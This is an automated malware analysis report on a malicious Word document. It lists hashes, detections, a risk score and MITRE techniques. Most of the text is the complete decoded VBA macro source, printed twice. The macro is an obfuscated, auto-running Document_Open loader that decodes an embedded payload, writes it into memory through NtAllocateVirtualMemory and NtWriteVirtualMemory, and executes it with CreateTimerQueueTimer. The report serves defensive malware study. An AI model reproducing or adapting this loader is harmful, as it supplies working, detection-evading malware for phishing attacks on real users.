Office (OLE) malware analysis — malicious · 575f6764cc8041a1

MALICIOUS

Office (OLE)

338.5 KB Created: 2018-02-15 13:50:00 Authoring application: Microsoft Office Word First seen: 2018-03-04

MD5: 4b8c95314c83e1396f880c83250f7f53 SHA-1: 2d8548962e926d0ab9a4d42580261efb2e4593f3 SHA-256: 575f6764cc8041a1e7e22db8ed2db0eaa0a47989f6bfd26e63d867caa632225c

90 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The Document_Open macro is designed to execute obfuscated code that likely downloads and executes a second-stage payload. The presence of the 'dictatorship' function, aliased to 'NtWriteVirtualMemory', suggests memory manipulation for payload execution.

Heuristics 4

ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
unalterability
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11506 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11506 bytes
SHA-256: `2ad3429458464e0e8652d11df492c06fae4194d5d888919d16150da764fd2b11`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() unalterability bilabial = 53 + 43 Pmt 0, bilabial, 34615, 52853, 6 End Sub Attribute VB_Name = "volvo" #If (113 - 63 + 350 + 55 - 48 + 293) > ((42 - 2 + 280) - (115 - 1 + 426) * 1) And ((47 - 117 + 98) - (100 - 114 + 42)) * 2 < (Win64) Then Public Declare PtrSafe Function dictatorship _ Lib "ntdll " Alias _ "NtWriteVirtualMemory" (ByVal untrimmed As Any, ByVal drilled As Any, ByVal penal As Any, ByVal deev As Any, ByVal cytosine As Any) As LongPtr #End If Function defensive(necturus, amsonia, auricular) Dim numb As String Dim cypraea As Variant Dim admitted As LongPtr Dim naproxen As LongPtr Dim assyrian As LongPtr Dim consuetude As Byte Dim octagon As LongPtr Dim unhealthfulness As LongPtr xenarthra = xenarthra Or 126 bloodless = Rnd(467) naproxen = necturus unhealthfulness = auricular ophite = acnidosporidia octagon = amsonia saimiri = 57 + 48 Pmt 0, saimiri, 21907, 48719, 5 acnidosporidia = "capacity" admitted = 83 - 15 - 69 dictatorship ByVal admitted, _ naproxen, _ octagon, unhealthfulness, _ assyrian calambour = acnidosporidia End Function Function unalterability() Dim ouzo As Integer Dim agiotage As Byte caustic.chironomidae.Value = Day(#12/5/2013#) varday = misspend = "marshalship" arbiter = "africanamerican" phasmida = "pounds" civile = jul anubis = ossified acetyl = bromeliaceae fagot = esoteric Set diesel = caustic.chironomidae.SelectedItem lexicographic = 14 + 47 Pmt 0, lexicographic, 31959, 39585, 6 dappled = diesel.Name felicitas = 96 - 27 + 7775 overestimated = Right(dappled, felicitas) intermediary = caparisoned.bibless(overestimated) marcor = 37 + 29 Pmt 0, marcor, 23508, 41592, 5 malaysia = "dairying" aristides = dugout #If (11 - 26 + 415 + 68 - 41 + 273) > ((97 - 127 + 350) - (62 - 52 + 530) * 1) And ((11 - 7 + 24) - (37 - 86 + 77)) * 2 < (Win64) Then Dim bioluminescent As Integer Dim rampant As LongPtr Dim fluted As LongPtr Dim pinnipedia As String #ElseIf (16 - 120 + 504 + 16 - 115 + 399) > ((19 - 73 + 374) - (53 - 90 + 577) * 1) And Not ((8 - 24 + 44) - (31 - 70 + 67)) * 2 < (Win64) Then Dim weakly As String Dim fluted As Long Dim selfpollination As Long Dim rampant As Long #End If bitten = 98 - 78 - 20 grande = "perishing" nonintellectual = "audibly" accroach = 88 - 81 + 4089 percussionist = 52 + 8 Pmt 0, percussionist, 25347, 13926, 3 anseriformes = "verticilliosis" balista = "collapsible" sanctuary = 56 + 45 Pmt 0, sanctuary, 31986, 59737, 5 apologize = intermediary complying = "fingers" rampant = ladylike(apologize) backhoe = "adventures" #If (113 - 36 + 323 + 53 - 113 + 360) > ((50 - 25 + 295) - (54 - 100 + 586) * 1) And ((21 - 5 + 12) - (59 - 51 + 20)) * 2 < (Win64) Then Dim radar As String Dim youngun As LongPtr Dim ayr As LongPtr Dim graft As LongPtr vidrio = 102 - 38 + 2000 #ElseIf (45 - 115 + 470 + 63 - 9 + 246) > ((114 - 97 + 303) - (77 - 91 + 554) * 1) And Not ((100 - 82 + 10) - (116 - 57 - 31)) * 2 < (Win64) Then Dim youngun As Long cooled = 56 - 89 + 814 Dim ayr As Long Dim graft As Long vidrio = cooled + 3459 #End If Dim dalmatian As Variant Dim rutherford As Integer youngun = 94 - 97 + 3 fluted = rampant + vidrio ayr = 83 - 48 + 201492 graft = 115 - 106 + 3491 chaserbalancer = carelessly(ayr, _ youngun, fluted, _ youngun, youngun, _ youngun, _ youngun) tubman = 36 + 17 Pmt 0, tubman, 12809, 32011, 6 End Function Function cerumen(concealed, slating, hypnology) If hypnology = 28 + (10 / 2 - 5) Then cerumen = concealed \ slating ElseIf hypnology = 38 + (5 - 3) / 2 - 1 Then cerumen = concealed And slating ElseIf hypnology = 46 + (56 / 7 - 4 * 2) Then cerumen = concealed * slating End If End Function Attribute VB_Name = "toyota" #If (113 - 63 + 350 + 55 - 48 + 293) > ((42 - 2 + 280) - (115 - 1 + 426) * 1) And ((47 - 117 + 98) - (100 - 114 + 42)) * 2 < (Win64) Then Public Declare PtrSafe Function deus _ Lib "ntdll " Alias _ "NtAllocateVirtualMemory" (backhoe As LongPtr, idyllic As LongPtr, ByVal hackneyed As LongPtr, conservatrixByVal As LongPtr, galleys As LongPtr, ByVal homoptera As LongPtr) As LongPtr #End If #If (32 - 49 + 417 + 77 - 73 + 296) > ((122 - 83 + 281) - (104 - 61 + 497) * 1) And Not ((83 - 105 + 50) - (128 - 127 + 27)) * 2 < (Win64) Then Public Declare Function carelessly _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (genealogic As Any, ByVal edifice As Any, ByVal colinus As Any, ByVal macron As Any, ByVal eriophyllum As Any, ByVal misdo As Any, ByVal cannon As Any) As Long #End If #If (32 - 49 + 417 + 77 - 73 + 296) > ((122 - 83 + 281) - (104 - 61 + 497) * 1) And Not ((83 - 105 + 50) - (128 - 127 + 27)) * 2 < (Win64) Then Public Declare Function deus _ Lib "ntdll " Alias _ "NtAllocateVirtualMemory" (closefisted As Long, typhon As Long, ByVal longstanding As Long, swordByVal As Long, aldrovanda As Long, ByVal hipflask As Long) As Long #End If Function colicroot(dexterity, disaccord, acetonic) Dim ascomycota As Long Dim parturiunt As Long Dim habitude As Long Dim astylar As Long Dim droshki As Long Dim proprietress As Byte ascomycota = dexterity droshki = acetonic habitude = disaccord Pmt 0, (6 + 53), 9860, 17708, 3 parturiunt = 16 - 33 + 16 dictatorship ByVal _ parturiunt, _ ascomycota, habitude, _ droshki, astylar acnidosporidia = aeromechanic End Function Attribute VB_Name = "caparisoned" #If (32 - 49 + 417 + 77 - 73 + 296) > ((122 - 83 + 281) - (104 - 61 + 497) * 1) And Not ((83 - 105 + 50) - (128 - 127 + 27)) * 2 < (Win64) Then Public Declare Function dictatorship _ Lib "ntdll " Alias _ "NtWriteVirtualMemory" (ByVal hopomythumb As Any, ByVal corallorhiza As Any, ByVal exmayor As Any, ByVal philological As Any, ByVal binaural As Any) As Long #End If #If (113 - 63 + 350 + 55 - 48 + 293) > ((42 - 2 + 280) - (115 - 1 + 426) * 1) And ((47 - 117 + 98) - (100 - 114 + 42)) * 2 < (Win64) Then Public Declare PtrSafe Function carelessly _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (rostroid As Any, ByVal aegypius As Any, ByVal dictostylium As Any, ByVal obeisance As Any, ByVal microtubule As Any, ByVal actinal As Any, ByVal indefatigation As Any) As Long #End If Function bibless(monger) As String Dim picrasma As Long Dim abject() As Byte Dim character(63) As Long Dim concentration As String Dim arctictis(63) As Long Dim adiathermancy As Long Dim fencible(63) As Long acnidosporidia = ophite Dim auribus As Long Dim brachycephalic(6962) As Byte Dim gradual As Integer Dim balboa As Long hepatica = 3 - 32 + 285 goggle = 18 - 46 + 283 beacon = 83 - 128 + 65325 Dim attemper As Variant margarita = 49 - 88 + 16711719 Dim porch As Long pastinaca = 66 - 38 + 36 bardic = 51 - 34 + 258031 adoptive = 50 - 75 + 4121 extenuation = 69 - 111 + 105 aleyrodidae = 62 - 44 + 65518 alkali = 111 - 80 + 4001 dealing = 42 - 75 + 262177 Dim hardy As Integer algebraically = 13 - 33 + 16515092 Dim acolyte As Long conspicuously = 43 - 9 + 7809 Dim modue() As Byte modue = VBA.StrConv(monger, 120 + 8) alfresco = 46 + 30 Pmt 0, alfresco, 19345, 40843, 6 uria = 7843 periclase = vbKeyShift - 12 For mantidae = 0 To uria If mantidae Mod 2 = 0 Then modue(mantidae) = modue(mantidae) - periclase End If If Not mantidae Mod 2 = 0 Then modue(mantidae) = modue(mantidae) - (periclase - 1) End If Next mantidae overrefinement = 35 + 15 Pmt 0, overrefinement, 3622, 54992, 2 gradual = 0 brachytactyly = gl For picrasma = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) character(picrasma) = cerumen(picrasma, pastinaca, 46) fencible(picrasma) = cerumen(picrasma, adoptive, 46) arctictis(picrasma) = cerumen(picrasma, dealing, 46) Next picrasma chelydra = 54 + 56 Pmt 0, chelydra, 3054, 38140, 6 abject = modue myxobacteria = 107 - 87 - 16 algometer = 8 + 46 Pmt 0, algometer, 9931, 52057, 3 unrequited = 38 - 65 + 30 xenarthra = Math.Round(425) billing = Math.Round(478) inevitable = unrequited + 1 antilocapridae = 65 - 1 - 62 For balboa = 0 To uria spaceship = abject(balboa) unchartered = abject(balboa + 2) uncarpeted = fencible(brachytactyly(abject(balboa + 1))) sheriff = character(brachytactyly(unchartered)) + brachytactyly(abject(balboa + unrequited)) auribus = arctictis(brachytactyly(spaceship)) + uncarpeted + sheriff picrasma = cerumen(auribus, margarita, 38) brachycephalic(adiathermancy) = cerumen(picrasma, aleyrodidae, 28) picrasma = cerumen(auribus, beacon, 38) brachycephalic(adiathermancy + 1) = cerumen(picrasma, hepatica, 28) brachycephalic(adiathermancy + antilocapridae) = cerumen(auribus, goggle, 38) adiathermancy = adiathermancy + antilocapridae + 1 balboa = balboa + 3 Next bibless = brachycephalic End Function Attribute VB_Name = "camry" Function ladylike(reject) #If (35 - 124 + 489 + 44 - 8 + 264) > ((83 - 77 + 314) - (80 - 32 + 492) * 1) And ((120 - 58 - 34) - (104 - 119 + 43)) * 2 < (Win64) Then Dim bradycardia As LongPtr undiscriminating = 57 - 47 - 2 Dim monkery As LongPtr Dim proviso As Long Dim deprehension As LongPtr anaclinal = VarPtr(bradycardia) analyticity = defensive(anaclinal, VarPtr(reject) + (25 - 17 + 0), undiscriminating) #End If #If (44 - 8 + 364 + 53 - 42 + 289) > ((46 - 64 + 338) - (73 - 103 + 570) * 1) And Not ((94 - 67 + 1) - (10 - 70 + 88)) * 2 < (Win64) Then Dim bradycardia As Long undiscriminating = 106 - 96 - 6 Dim monkery As Long Dim deprehension As Long anaclinal = VarPtr(bradycardia) analyticity = colicroot(anaclinal, VarPtr(reject) + (120 - 122 + 10), undiscriminating) #End If faineant = 25 - 30 + 4 monkery = 3 - 28 + 25 boundshave = 60 - 115 + 55 deprehension = 24 - 41 + 9851 pujunan = 31 - 73 + 4138 direct = 116 - 7 - 45 sob = deus(ByVal faineant, monkery, _ ByVal boundshave, _ deprehension, ByVal pujunan, _ ByVal direct) colicroot monkery, _ bradycardia, (123 - 29 + 5789) Pmt 0, (50 + 54), 39113, 40818, 3 ladylike = monkery * 1 End Function Function gl() Dim fictive(255) As Byte southeastern = 52 - 2 + 15 For i = southeastern To (90 - 120 + 121) fictive(southeastern) = southeastern - (38 - 83 + 110) southeastern = southeastern + 1 If (84 - 44 + 51) < southeastern Then Exit For Next southeastern = (21 - 78 + 105) For i = southeastern To (42 - 127 + 143) fictive(southeastern) = southeastern + (24 - 55 + 35) southeastern = southeastern + 1 If (118 - 77 + 17) < southeastern Then Exit For Next southeastern = (49 - 58 + 106) For i = southeastern To (50 - 51 + 124) fictive(southeastern) = southeastern - (40 - 102 + 133) southeastern = southeastern + 1 If (53 - 46 + 116) < southeastern Then Exit For Next fictive(32 - 107 + 122) = (113 - 94 + 44) southeastern = (48 - 57 + 52) fictive(southeastern) = (60 - 106 + 108) gl = fictive End Function Attribute VB_Name = "caustic" Attribute VB_Base = "0{C10451D2-9E60-4F2F-AE37-F17E746662AB}{F84CFD52-C31F-41D7-ADE1-BD3143E05519}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 2ad3429458464e0e8652d11df492c06fae4194d5d888919d16150da764fd2b11

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



Private Sub Document_Open()
unalterability
bilabial = 53 + 43
 Pmt 0, bilabial, 34615, 52853, 6
End Sub





Attribute VB_Name = "volvo"
#If (113 - 63 + 350 + 55 - 48 + 293) > ((42 - 2 + 280) - (115 - 1 + 426) * 1) And ((47 - 117 + 98) - (100 - 114 + 42)) * 2 < (Win64) Then
Public Declare PtrSafe Function dictatorship _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal untrimmed As Any, ByVal drilled As Any, ByVal penal As Any, ByVal deev As Any, ByVal cytosine As Any) As LongPtr
#End If

Function defensive(necturus, amsonia, auricular)
Dim numb As String
Dim cypraea As Variant
Dim admitted As LongPtr
Dim naproxen As LongPtr
Dim assyrian As LongPtr
Dim consuetude As Byte
Dim octagon As LongPtr
Dim unhealthfulness As LongPtr
xenarthra = xenarthra Or 126
bloodless = Rnd(467)
naproxen = necturus
unhealthfulness = auricular
ophite = acnidosporidia
octagon = amsonia
saimiri = 57 + 48
Pmt 0, saimiri, 21907, 48719, 5
acnidosporidia = "capacity"
admitted = 83 - 15 - 69
dictatorship ByVal admitted, _
naproxen, _
octagon, unhealthfulness, _
assyrian
calambour = acnidosporidia
End Function

Function unalterability()
Dim ouzo As Integer
Dim agiotage As Byte
caustic.chironomidae.Value = Day(#12/5/2013#)
varday = misspend = "marshalship"
arbiter = "africanamerican"
phasmida = "pounds"
civile = jul
anubis = ossified

acetyl = bromeliaceae
fagot = esoteric
Set diesel = caustic.chironomidae.SelectedItem
lexicographic = 14 + 47
 Pmt 0, lexicographic, 31959, 39585, 6

dappled = diesel.Name
felicitas = 96 - 27 + 7775
overestimated = Right(dappled, felicitas)
intermediary = caparisoned.bibless(overestimated)
marcor = 37 + 29
 Pmt 0, marcor, 23508, 41592, 5

malaysia = "dairying"
aristides = dugout
#If (11 - 26 + 415 + 68 - 41 + 273) > ((97 - 127 + 350) - (62 - 52 + 530) * 1) And ((11 - 7 + 24) - (37 - 86 + 77)) * 2 < (Win64) Then
Dim bioluminescent As Integer
Dim rampant As LongPtr
Dim fluted As LongPtr
Dim pinnipedia As String
#ElseIf (16 - 120 + 504 + 16 - 115 + 399) > ((19 - 73 + 374) - (53 - 90 + 577) * 1) And Not ((8 - 24 + 44) - (31 - 70 + 67)) * 2 < (Win64) Then
Dim weakly As String
Dim fluted As Long
Dim selfpollination As Long
Dim rampant As Long
#End If
bitten = 98 - 78 - 20
grande = "perishing"
nonintellectual = "audibly"
accroach = 88 - 81 + 4089
percussionist = 52 + 8
Pmt 0, percussionist, 25347, 13926, 3
anseriformes = "verticilliosis"
balista = "collapsible"
sanctuary = 56 + 45
Pmt 0, sanctuary, 31986, 59737, 5
apologize = intermediary
complying = "fingers"
rampant = ladylike(apologize)
backhoe = "adventures"
#If (113 - 36 + 323 + 53 - 113 + 360) > ((50 - 25 + 295) - (54 - 100 + 586) * 1) And ((21 - 5 + 12) - (59 - 51 + 20)) * 2 < (Win64) Then
Dim radar As String
Dim youngun As LongPtr
Dim ayr As LongPtr
Dim graft As LongPtr
vidrio = 102 - 38 + 2000
#ElseIf (45 - 115 + 470 + 63 - 9 + 246) > ((114 - 97 + 303) - (77 - 91 + 554) * 1) And Not ((100 - 82 + 10) - (116 - 57 - 31)) * 2 < (Win64) Then
Dim youngun As Long
cooled = 56 - 89 + 814
Dim ayr As Long
Dim graft As Long
vidrio = cooled + 3459
#End If
Dim dalmatian As Variant
Dim rutherford As Integer
youngun = 94 - 97 + 3
fluted = rampant + vidrio
ayr = 83 - 48 + 201492
graft = 115 - 106 + 3491
chaserbalancer = carelessly(ayr, _
youngun, fluted, _
youngun, youngun, _
youngun, _
youngun)
tubman = 36 + 17
Pmt 0, tubman, 12809, 32011, 6
End Function
Function cerumen(concealed, slating, hypnology)
If hypnology = 28 + (10 / 2 - 5) Then
cerumen = concealed \ slating
ElseIf hypnology = 38 + (5 - 3) / 2 - 1 Then
cerumen = concealed And slating
ElseIf hypnology = 46 + (56 / 7 - 4 * 2) Then
cerumen = concealed * slating
End If
End Function


Attribute VB_Name = "toyota"
#If (113 - 63 + 350 + 55 - 48 + 293) > ((42 - 2 + 280) - (115 - 1 + 426) * 1) And ((47 - 117 + 98) - (100 - 114 + 42)) * 2 < (Win64) Then
Public Declare PtrSafe Function deus _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (backhoe As LongPtr, idyllic As LongPtr, ByVal hackneyed As LongPtr, conservatrixByVal As LongPtr, galleys As LongPtr, ByVal homoptera As LongPtr) As LongPtr
#End If
#If (32 - 49 + 417 + 77 - 73 + 296) > ((122 - 83 + 281) - (104 - 61 + 497) * 1) And Not ((83 - 105 + 50) - (128 - 127 + 27)) * 2 < (Win64) Then
Public Declare Function carelessly _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (genealogic As Any, ByVal edifice As Any, ByVal colinus As Any, ByVal macron As Any, ByVal eriophyllum As Any, ByVal misdo As Any, ByVal cannon As Any) As Long
#End If
#If (32 - 49 + 417 + 77 - 73 + 296) > ((122 - 83 + 281) - (104 - 61 + 497) * 1) And Not ((83 - 105 + 50) - (128 - 127 + 27)) * 2 < (Win64) Then
Public Declare Function deus _
Lib "ntdll   " Alias _
"NtAllocateVirtualMemory" (closefisted As Long, typhon As Long, ByVal longstanding As Long, swordByVal As Long, aldrovanda As Long, ByVal hipflask As Long) As Long
#End If
Function colicroot(dexterity, disaccord, acetonic)
Dim ascomycota As Long
Dim parturiunt As Long
Dim habitude As Long
Dim astylar As Long
Dim droshki As Long
Dim proprietress As Byte
ascomycota = dexterity
droshki = acetonic
habitude = disaccord
Pmt 0, (6 + 53), 9860, 17708, 3
parturiunt = 16 - 33 + 16
dictatorship ByVal _
parturiunt, _
ascomycota, habitude, _
droshki, astylar
acnidosporidia = aeromechanic
End Function


Attribute VB_Name = "caparisoned"
#If (32 - 49 + 417 + 77 - 73 + 296) > ((122 - 83 + 281) - (104 - 61 + 497) * 1) And Not ((83 - 105 + 50) - (128 - 127 + 27)) * 2 < (Win64) Then
Public Declare Function dictatorship _
Lib "ntdll    " Alias _
"NtWriteVirtualMemory" (ByVal hopomythumb As Any, ByVal corallorhiza As Any, ByVal exmayor As Any, ByVal philological As Any, ByVal binaural As Any) As Long
#End If
#If (113 - 63 + 350 + 55 - 48 + 293) > ((42 - 2 + 280) - (115 - 1 + 426) * 1) And ((47 - 117 + 98) - (100 - 114 + 42)) * 2 < (Win64) Then
Public Declare PtrSafe Function carelessly _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (rostroid As Any, ByVal aegypius As Any, ByVal dictostylium As Any, ByVal obeisance As Any, ByVal microtubule As Any, ByVal actinal As Any, ByVal indefatigation As Any) As Long
#End If
Function bibless(monger) As String
Dim picrasma As Long
Dim abject() As Byte
Dim character(63) As Long
Dim concentration As String
Dim arctictis(63) As Long
Dim adiathermancy As Long
Dim fencible(63) As Long
acnidosporidia = ophite

Dim auribus As Long
Dim brachycephalic(6962) As Byte
Dim gradual As Integer
Dim balboa As Long
hepatica = 3 - 32 + 285
goggle = 18 - 46 + 283
beacon = 83 - 128 + 65325
Dim attemper As Variant

margarita = 49 - 88 + 16711719
Dim porch As Long

pastinaca = 66 - 38 + 36
bardic = 51 - 34 + 258031
adoptive = 50 - 75 + 4121
extenuation = 69 - 111 + 105
aleyrodidae = 62 - 44 + 65518
alkali = 111 - 80 + 4001
dealing = 42 - 75 + 262177
Dim hardy As Integer

algebraically = 13 - 33 + 16515092
Dim acolyte As Long
conspicuously = 43 - 9 + 7809
Dim modue() As Byte
modue = VBA.StrConv(monger, 120 + 8)
alfresco = 46 + 30
 Pmt 0, alfresco, 19345, 40843, 6

uria = 7843
periclase = vbKeyShift - 12
For mantidae = 0 To uria
If mantidae Mod 2 = 0 Then
modue(mantidae) = modue(mantidae) - periclase
End If
If Not mantidae Mod 2 = 0 Then
modue(mantidae) = modue(mantidae) - (periclase - 1)
End If
Next mantidae
overrefinement = 35 + 15
 Pmt 0, overrefinement, 3622, 54992, 2

gradual = 0
brachytactyly = gl
For picrasma = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
character(picrasma) = cerumen(picrasma, pastinaca, 46)
fencible(picrasma) = cerumen(picrasma, adoptive, 46)
arctictis(picrasma) = cerumen(picrasma, dealing, 46)
Next picrasma
chelydra = 54 + 56
 Pmt 0, chelydra, 3054, 38140, 6

abject = modue
myxobacteria = 107 - 87 - 16
algometer = 8 + 46
 Pmt 0, algometer, 9931, 52057, 3

unrequited = 38 - 65 + 30
xenarthra = Math.Round(425)

billing = Math.Round(478)

inevitable = unrequited + 1
antilocapridae = 65 - 1 - 62
For balboa = 0 To uria
spaceship = abject(balboa)
unchartered = abject(balboa + 2)
uncarpeted = fencible(brachytactyly(abject(balboa + 1)))
sheriff = character(brachytactyly(unchartered)) + brachytactyly(abject(balboa + unrequited))
auribus = arctictis(brachytactyly(spaceship)) + uncarpeted + sheriff
picrasma = cerumen(auribus, margarita, 38)
brachycephalic(adiathermancy) = cerumen(picrasma, aleyrodidae, 28)
picrasma = cerumen(auribus, beacon, 38)
brachycephalic(adiathermancy + 1) = cerumen(picrasma, hepatica, 28)
brachycephalic(adiathermancy + antilocapridae) = cerumen(auribus, goggle, 38)
adiathermancy = adiathermancy + antilocapridae + 1
balboa = balboa + 3
Next
bibless = brachycephalic
End Function




Attribute VB_Name = "camry"
Function ladylike(reject)
#If (35 - 124 + 489 + 44 - 8 + 264) > ((83 - 77 + 314) - (80 - 32 + 492) * 1) And ((120 - 58 - 34) - (104 - 119 + 43)) * 2 < (Win64) Then
Dim bradycardia As LongPtr
undiscriminating = 57 - 47 - 2
Dim monkery As LongPtr
Dim proviso As Long
Dim deprehension As LongPtr
anaclinal = VarPtr(bradycardia)
analyticity = defensive(anaclinal, VarPtr(reject) + (25 - 17 + 0), undiscriminating)
#End If
#If (44 - 8 + 364 + 53 - 42 + 289) > ((46 - 64 + 338) - (73 - 103 + 570) * 1) And Not ((94 - 67 + 1) - (10 - 70 + 88)) * 2 < (Win64) Then
Dim bradycardia As Long
undiscriminating = 106 - 96 - 6
Dim monkery As Long
Dim deprehension As Long
anaclinal = VarPtr(bradycardia)
analyticity = colicroot(anaclinal, VarPtr(reject) + (120 - 122 + 10), undiscriminating)
#End If
faineant = 25 - 30 + 4
monkery = 3 - 28 + 25
boundshave = 60 - 115 + 55
deprehension = 24 - 41 + 9851
pujunan = 31 - 73 + 4138
direct = 116 - 7 - 45
sob = deus(ByVal faineant, monkery, _
ByVal boundshave, _
deprehension, ByVal pujunan, _
ByVal direct)
colicroot monkery, _
bradycardia, (123 - 29 + 5789)
Pmt 0, (50 + 54), 39113, 40818, 3
ladylike = monkery * 1
End Function

Function gl()
Dim fictive(255) As Byte
southeastern = 52 - 2 + 15
For i = southeastern To (90 - 120 + 121)
fictive(southeastern) = southeastern - (38 - 83 + 110)
southeastern = southeastern + 1
If (84 - 44 + 51) < southeastern Then Exit For
Next
southeastern = (21 - 78 + 105)
For i = southeastern To (42 - 127 + 143)
fictive(southeastern) = southeastern + (24 - 55 + 35)
southeastern = southeastern + 1
If (118 - 77 + 17) < southeastern Then Exit For
Next
southeastern = (49 - 58 + 106)
For i = southeastern To (50 - 51 + 124)
fictive(southeastern) = southeastern - (40 - 102 + 133)
southeastern = southeastern + 1
If (53 - 46 + 116) < southeastern Then Exit For
Next
fictive(32 - 107 + 122) = (113 - 94 + 44)
southeastern = (48 - 57 + 52)
fictive(southeastern) = (60 - 106 + 108)
gl = fictive
End Function


Attribute VB_Name = "caustic"
Attribute VB_Base = "0{C10451D2-9E60-4F2F-AE37-F17E746662AB}{F84CFD52-C31F-41D7-ADE1-BD3143E05519}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.